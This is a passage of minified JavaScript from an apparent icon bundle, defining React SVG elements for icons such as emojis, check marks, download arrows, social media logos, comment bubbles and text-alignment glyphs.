1 0-2h3Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.5 5.111a1 1 0 1 1 2 0v3.3l1.485.826.087.054a1 1 0 0 1-.966 1.739l-.091-.045-2-1.111A1 1 0 0 1 14.5 9V5.11Z"})),confused_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 9a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm-5.95 8.51c.63-.68 2.871-2.237 6.317-1.617a.75.75 0 1 0 .266-1.476c-4.02-.723-6.758 1.075-7.683 2.073a.75.75 0 1 0 1.1 1.02Z",clipRule:"evenodd"})),correct_save_check_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.737 8.426a1 1 0 0 0-1.474-1.352l-4.794 5.23-1.762-1.761a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.444-.031l5.5-6Z",clipRule:"evenodd"})),correct_save_check_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18.731 5.36a1 1 0 0 1 1.537 1.28l-10 12a1.001 1.001 0 0 1-1.475.067l-5-5a1 1 0 1 1 1.414-1.414l4.225 4.225 9.3-11.159Z"})),cross_close_x_minimize_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.707 7.293a1 1 0 0 0-1.414 1.414L10.586 12l-3.293 3.293a1 1 0 1 0 1.414 1.414L12 13.414l3.293 3.293a1 1 0 0 0 1.414-1.414L13.414 12l3.293-3.293a1 1 0 0 0-1.414-1.414L12 10.586 8.707 7.293Z",clipRule:"evenodd"})),cross_x_close_minimize_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L13.414 12l5.293 5.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L12 13.414l-5.293 5.293a1 1 0 1 1-1.414-1.414L10.586 12 5.293 6.707a1 1 0 1 1 1.414-1.414L12 10.586l5.293-5.293Z"})),desktop_monitor_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 17.75H4A2.75 2.75 0 0 1 1.25 15V5A2.75 2.75 0 0 1 4 2.25h16A2.75 2.75 0 0 1 22.75 5v10A2.75 2.75 0 0 1 20 17.75h-7V20h3a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h3v-2.25Zm1.01-5.25a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Z",clipRule:"evenodd"})),dot_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Z",clipRule:"evenodd"})),download_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2 19v-4a1 1 0 1 1 2 0v4c0 .548.452 1 1 1h14a1 1 0 0 0 1-1v-4a1 1 0 1 1 2 0v4a3 3 0 0 1-3 3H5c-1.652 0-3-1.348-3-3Z"}),(0,a.createElement)("path",{d:"M12 1.5a1 1 0 0 0-1 1V8H7a1 1 0 0 0-.707 1.707l5 5a1 1 0 0 0 1.414 0l5-5A1 1 0 0 0 17 8h-4V2.5a1 1 0 0 0-1-1Z"})),download_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 21.53a.75.75 0 0 0 1.06 0l2.5-2.5a.75.75 0 0 0-.53-1.28h-1.75V13a.75.75 0 0 0-1.5 0v4.75H9.5a.75.75 0 0 0-.53 1.28l2.5 2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),facebook_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h6.412v-7.076H9.5V11.84h1.912v-1.22C11.412 7.462 12.84 6 15.94 6c.587 0 1.601.115 2.016.23V8.8a11.904 11.904 0 0 0-1.071-.035c-1.52 0-2.108.575-2.108 2.073v1.002h3.029l-.52 2.834h-2.51v7.076H19A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Z"})),google_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"m21.882 10.42-.103-.438h-9.485v4.036h5.667c-.588 2.81-3.318 4.289-5.549 4.289-1.623 0-3.333-.686-4.465-1.79a6.412 6.412 0 0 1-1.902-4.524c0-1.7.76-3.402 1.865-4.52 1.106-1.12 2.776-1.745 4.437-1.745 1.902 0 3.264 1.015 3.774 1.478l2.853-2.853c-.837-.74-3.136-2.603-6.72-2.603-2.764 0-5.414 1.065-7.352 3.007C2.99 6.669 2 9.434 2 12c0 2.566.937 5.193 2.79 7.12 1.98 2.056 4.784 3.13 7.671 3.13 2.627 0 5.117-1.035 6.892-2.913C21.098 17.488 22 14.93 22 12.249c0-1.129-.113-1.8-.118-1.829Z"})),growth_increase_up_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 6a1 1 0 0 1 1 1v6a1 1 0 0 1-1.706.707L18 11.414l-4.793 4.793a1 1 0 0 1-1.414 0L8.5 12.914l-4.993 4.993a1 1 0 0 1-1.414-1.414l5.7-5.7.073-.066a1 1 0 0 1 1.34.066l3.294 3.293L16.587 10l-2.293-2.293A1 1 0 0 1 15 6h6Z"})),hamicon_4_sloid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 3h18v3H3zm0 7.5h18v3H3v-3ZM3 18h18v3H3v-3Z"})),hamicon_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1ZM4 18a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1Zm6.5-13a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM17 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10 12a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0-7a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0 14a2 2 0 1 1 4 0 2 2 0 0 1-4 0Z"})),happy_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V8a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 0 1-2 0V8a1 1 0 0 1 1-1Zm-8 5.575a.675.675 0 0 0-.675.675 5.175 5.175 0 1 0 10.35 0 .675.675 0 0 0-.675-.675h-9Z",clipRule:"evenodd"})),heart_love_wishlist_favourite_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.433 5.288a5.797 5.797 0 0 0-8.198 0L12 5.523l-.235-.235a5.797 5.797 0 0 0-8.198 0 6.428 6.428 0 0 0 0 9.09l7.52 7.52a1.292 1.292 0 0 0 1.826 0l7.519-7.52a6.428 6.428 0 0 0 0-9.09Zm-4.169 1.285a1 1 0 1 0 0 2c.299 0 .595.114.822.341.323.323.46.76.41 1.183a1 1 0 0 0 1.986.234A3.43 3.43 0 0 0 18.5 7.5a3.156 3.156 0 0 0-2.236-.927Z",clipRule:"evenodd"})),hemicon_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h7.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hidden_hide_invisible_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.87 3.07a.75.75 0 0 1 1.06 1.061l-16.799 16.8a.75.75 0 0 1-1.06-1.06l1.857-1.859c-1.397-1.145-2.487-2.454-3.25-3.516a20.19 20.19 0 0 1-1.255-1.985 9.52 9.52 0 0 1-.067-.127l-.025-.049a.758.758 0 0 1 0-.673l.015-.03.016-.03.016-.03.007-.014a18.243 18.243 0 0 1 .72-1.217A20.435 20.435 0 0 1 3.33 7.486c1.938-2.067 4.873-4.237 8.672-4.238 2.269 0 4.231.778 5.852 1.84L19.87 3.07ZM8.874 14.067A3.73 3.73 0 0 1 8.25 12 3.75 3.75 0 0 1 12 8.25a3.73 3.73 0 0 1 2.066.624l-5.192 5.192Zm11.657-6.405c.205.008.397.1.533.253a20.672 20.672 0 0 1 1.933 2.583 17.693 17.693 0 0 1 .661 1.138l.01.019a.77.77 0 0 1 .004.68l-.016.03-.032.06-.007.014a18.22 18.22 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.224 2.855c-1.938 2.067-4.872 4.237-8.672 4.237a9.97 9.97 0 0 1-3.243-.545.752.752 0 0 1-.277-1.25l11.5-11.082.057-.05a.753.753 0 0 1 .493-.16Z",clipRule:"evenodd"})),home_house_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75h-3.5A1.75 1.75 0 0 1 13.75 20v-5a.25.25 0 0 0-.25-.25h-3a.25.25 0 0 0-.25.25v5a1.75 1.75 0 0 1-1.75 1.75H5A2.75 2.75 0 0 1 2.25 19v-8.1c0-.786.336-1.534.923-2.056l7-6.223a2.75 2.75 0 0 1 3.654 0l7 6.223a2.75 2.75 0 0 1 .923 2.056V19Z"})),hourglass_timer_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 1.25a.75.75 0 0 1 0 1.5h-1.25v4.18c0 .92-.46 1.778-1.225 2.288L13.352 12l4.173 2.782a2.75 2.75 0 0 1 1.225 2.288v4.18H20a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1 0-1.5h1.25v-4.18c0-.92.46-1.778 1.225-2.288L10.648 12 6.475 9.218A2.75 2.75 0 0 1 5.25 6.93V2.75H4a.75.75 0 0 1 0-1.5h16ZM13.75 16.5a.75.75 0 0 0-.75-.75h-2a.75.75 0 0 0 0 1.5h2a.75.75 0 0 0 .75-.75Zm.75 2.25a.75.75 0 0 1 0 1.5h-5a.75.75 0 0 1 0-1.5h5Z",clipRule:"evenodd"})),instagram_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9 12a3 3 0 1 1 6 0 3 3 0 0 1-6 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm12.5 5.5a1.25 1.25 0 1 0 0-2.5 1.25 1.25 0 0 0 0 2.5ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Z",clipRule:"evenodd"})),laptop_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.75 15.25V6A2.75 2.75 0 0 1 5.5 3.25h13A2.75 2.75 0 0 1 21.25 6v9.25H2.75ZM13.5 6a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3ZM1.25 18v-1.25h21.5V18A2.75 2.75 0 0 1 20 20.75H4A2.75 2.75 0 0 1 1.25 18Z",clipRule:"evenodd"})),left_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18ZM11 20a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h8Zm10-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18ZM11 8a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h8Z"})),left_triangle_angle_arrow_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.75 19c0 1.442-1.646 2.265-2.8 1.4l-9.333-7a1.75 1.75 0 0 1 0-2.8l9.333-7c1.154-.865 2.8-.042 2.8 1.4v14Z"})),linkedin_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm11.15 16.792h2.893v-5.945c0-2.515-1.425-3.731-3.417-3.731-1.992 0-2.83 1.552-2.83 1.552V9.652h-2.79v9.389h2.79v-4.929c0-1.32.607-2.106 1.77-2.106 1.07 0 1.584.755 1.584 2.106v4.929ZM4.96 6.69c0 .957.77 1.732 1.72 1.732s1.719-.775 1.719-1.732-.77-1.733-1.72-1.733S4.96 5.733 4.96 6.69Zm3.188 12.35H5.24V9.654h2.908v9.389Z",clipRule:"evenodd"})),link_chains_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.264 9.281a1 1 0 0 1 1.415 1.415L5.165 13.21a3.977 3.977 0 1 0 5.625 5.625l2.514-2.514a1 1 0 0 1 1.415 1.414l-2.515 2.514a5.977 5.977 0 1 1-8.453-8.453L6.264 9.28Zm5.532-5.53a5.977 5.977 0 1 1 8.453 8.453l-2.514 2.515a1 1 0 0 1-1.414-1.415l2.514-2.514a3.977 3.977 0 1 0-5.625-5.625l-2.514 2.514a1.001 1.001 0 0 1-1.415-1.414l2.515-2.514Z"}),(0,a.createElement)("path",{d:"M13.793 8.793a1 1 0 1 1 1.414 1.414l-5 5a1 1 0 0 1-1.414-1.414l5-5Z"})),location_gps_map_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.625 22.65 12 22l.375.65a.75.75 0 0 1-.75 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.625 22.65 12 22c.375.65.376.649.376.649l.002-.001.006-.004.02-.012.034-.02.04-.024a19.765 19.765 0 0 0 1.212-.814 22.44 22.44 0 0 0 2.847-2.456c2.058-2.11 4.213-5.239 4.213-9.113 0-4.928-3.9-8.955-8.75-8.955s-8.75 4.027-8.75 8.955c0 3.874 2.155 7.002 4.213 9.113a22.436 22.436 0 0 0 3.788 3.101 12.961 12.961 0 0 0 .344.213l.021.012.006.004.003.001ZM12 6.25a3.75 3.75 0 1 0 0 7.5 3.75 3.75 0 0 0 0-7.5Z",clipRule:"evenodd"})),long_arrow_up_top_increase_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 21V10H6a1 1 0 0 1-.707-1.707l6-6 .076-.068a1 1 0 0 1 1.338.068l6 6A1 1 0 0 1 18 10h-5v11a1 1 0 1 1-2 0Z"})),mail_email_messege_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v12A2.75 2.75 0 0 0 4 20.75h16A2.75 2.75 0 0 0 22.75 18V6A2.75 2.75 0 0 0 20 3.25H4ZM6.6 7.2a1 1 0 1 0-1.2 1.6l4.8 3.6a3 3 0 0 0 3.6 0l4.8-3.6a1 1 0 0 0-1.2-1.6l-4.8 3.6a1 1 0 0 1-1.2 0L6.6 7.2Z",clipRule:"evenodd"})),media_document_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2.25 19V5A2.75 2.75 0 0 1 5 2.25h10.172c.73 0 1.429.29 1.944.806l3.828 3.828a2.75 2.75 0 0 1 .806 1.944V19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19ZM15 15.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2-7a1 1 0 0 0-1-1H8a1 1 0 0 0 0 2h4a1 1 0 0 0 1-1Zm4 3.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h8a1 1 0 0 0 1-1Z"})),messege_comment_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 16A2.75 2.75 0 0 1 20 18.75H7.264l-4.795 3.836A.75.75 0 0 1 1.25 22V7A2.75 2.75 0 0 1 4 4.25h16A2.75 2.75 0 0 1 22.75 7v9ZM14 9.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9ZM14 8.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v9A2.75 2.75 0 0 0 4 17.75h3.75V21a.75.75 0 0 0 1.219.586l4.794-3.836H20A2.75 2.75 0 0 0 22.75 15V6A2.75 2.75 0 0 0 20 3.25H4ZM9 10a1 1 0 0 0-2 0v1a1 1 0 1 0 2 0v-1Zm3-1a1 1 0 0 1 1 1v1a1 1 0 1 1-2 0v-1a1 1 0 0 1 1-1Zm5 1a1 1 0 1 0-2 0v1a1 1 0 1 0 2 0v-1Z",clipRule:"evenodd"})),messege_comment_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9Z"})),messege_comment_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.75 12A9.75 9.75 0 0 1 12 21.75H3a.75.75 0 0 1-.75-.75v-9c0-5.385 4.365-9.75 9.75-9.75s9.75 4.365 9.75 9.75ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 3.25A5.75 5.75 0 0 1 22.75 9v7a.75.75 0 0 1-.75.75h-5.31a4.75 4.75 0 0 1-4.69 4H2a.75.75 0 0 1-.75-.75v-6a4.751 4.751 0 0 1 4-4.691V9A5.75 5.75 0 0 1 11 3.25h6ZM5.25 10.838A3.25 3.25 0 0 0 2.75 14v5.25H12a3.25 3.25 0 0 0 3.162-2.5H11A5.75 5.75 0 0 1 5.25 11v-.162ZM11 10.75a1 1 0 1 0 0 2h6a1 1 0 1 0 0-2h-6Zm0-3.5a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-4Z",clipRule:"evenodd"})),messege_comment_7_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 11.5c0 5.218-4.932 9.25-10.75 9.25-.921 0-1.817-.101-2.672-.29l-2.956 1.691A.75.75 0 0 1 5.25 21.5v-2.8c-2.411-1.675-4-4.258-4-7.2 0-5.218 4.932-9.25 10.75-9.25s10.75 4.032 10.75 9.25ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2 2.5a1 1 0 1 1 0 2h-4a1 1 0 1 1 0-2h4Z",clipRule:"evenodd"})),messege_comment_8_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 3.25c4.542 0 8.25 3.613 8.25 8.102 0 2.519-1.172 4.764-3 6.247V20a.75.75 0 0 1-1.163.626l-2.13-1.404a8.41 8.41 0 0 1-1.957.231 8.323 8.323 0 0 1-4.61-1.382 7.867 7.867 0 0 1-3.075-.06l-1.82 1.127A.75.75 0 0 1 3.85 18.5v-1.87c-1.576-1.222-2.6-3.07-2.6-5.157C1.25 7.7 4.557 4.75 8.5 4.75c.319 0 .634.02.942.057a.755.755 0 0 1 .15.033A8.318 8.318 0 0 1 14.5 3.25ZM8.08 6.265c-3.03.195-5.33 2.505-5.33 5.208 0 1.68.878 3.196 2.276 4.162a.75.75 0 0 1 .324.617v.903l.943-.583a.75.75 0 0 1 .587-.086c.45.12.925.188 1.416.203A7.98 7.98 0 0 1 8.08 6.265Z",clipRule:"evenodd"})),messenger_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M1.25 11.677C1.25 5.687 5.945 1.25 12 1.25s10.75 4.44 10.75 10.43c0 5.99-4.695 10.427-10.75 10.427a11.75 11.75 0 0 1-3.112-.414.864.864 0 0 0-.575.043l-2.134.94a.86.86 0 0 1-1.207-.76l-.059-1.913a.85.85 0 0 0-.288-.613c-2.09-1.87-3.375-4.58-3.375-7.713Zm7.452-1.959-3.157 5.01c-.304.48.287 1.02.739.677l3.391-2.575a.644.644 0 0 1 .777-.003l2.513 1.884a1.612 1.612 0 0 0 2.332-.43l3.161-5.006c.301-.481-.29-1.024-.742-.68l-3.391 2.574a.644.644 0 0 1-.777.003l-2.513-1.884a1.613 1.613 0 0 0-2.333.43Z",clipRule:"evenodd"})),microsoft_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.25 2.25v9h-9V5A2.75 2.75 0 0 1 5 2.25h6.25Zm1.5 0v9h9V5A2.75 2.75 0 0 0 19 2.25h-6.25Zm9 10.5h-9v9H19A2.75 2.75 0 0 0 21.75 19v-6.25Zm-10.5 9v-9h-9V19A2.75 2.75 0 0 0 5 21.75h6.25Z"})),middle_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm-5 18a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h8Zm5-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm-5-6a1 1 0 1 1 0 2H8a1 1 0 0 1 